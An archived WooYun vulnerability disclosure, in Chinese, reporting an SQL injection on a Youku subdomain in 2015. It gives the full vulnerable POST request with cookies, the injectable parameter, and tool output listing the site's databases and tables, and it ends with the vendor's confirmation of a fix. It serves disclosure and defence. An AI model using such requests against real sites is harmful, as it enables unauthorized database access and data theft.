乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-05: 细节已通知厂商并且等待厂商处理中 2015-05-05: 厂商已经确认,细节仅向厂商公开 2015-05-15: 细节向核心白帽子及相关领域专家公开 2015-05-25: 细节向普通白帽子公开 2015-06-04: 细节向实习白帽子公开 2015-06-19: 细节向公众公开
优酷某站SQL注入
站点:allthingshair.youku.com
POST /api/index.php?r=video/submitCategoryIdGetVideoList HTTP/1.1Host: allthingshair.youku.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: __ysuid=1420857555262JT0; _ga=GA1.2.1068351650.1428639210; _acxm=e68d61d2-df37-11e4-8f80-02420f4ad091; Hm_lvt_aef6ec7144c5dc468472f824bcdbbcac=1428639210,1430809766; ykss=106748550f233e3521db0f0d; u=__LOGOUT__; Hm_lpvt_aef6ec7144c5dc468472f824bcdbbcac=1430814038; PHPSESSID=fn2184otgahgh47jqo3ina41u6X-Forwarded-For: 8.8.8.8Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 60categoryId=&orderByTime=3&byCountNum=3&pageSize=16&nowPage=1
参数:categoryId=
The table "member_wechat" for active record class "MemberWechat" cannot be found in the database.[16:15:31] [INFO] the back-end DBMS is MySQLweb application technology: Apacheback-end DBMS: MySQL >= 5.0.0current user: 'allthingshair@%'current database: 'allthingshair'available databases [3]:[*] allthingshair[*] information_schema[*] testDatabase: allthingshair+---------------------+---------+| Table | Entries |+---------------------+---------+| daily_video_account | 2470 || member_youku | 195 || product_list | 106 || video_main_list | 55 || video_minor_list | 55 || attribute_list | 18 || keyword_count | 15 || category_list | 13 || vlogger_list | 8 || hot_topic_video | 6 || subscribe_list | 1 || tbl_admin_user | 1 |+---------------------+---------+
危害等级:高
漏洞Rank:12
确认时间:2015-05-05 18:23
感谢关注优酷安全!该问题已经安排修复!
暂无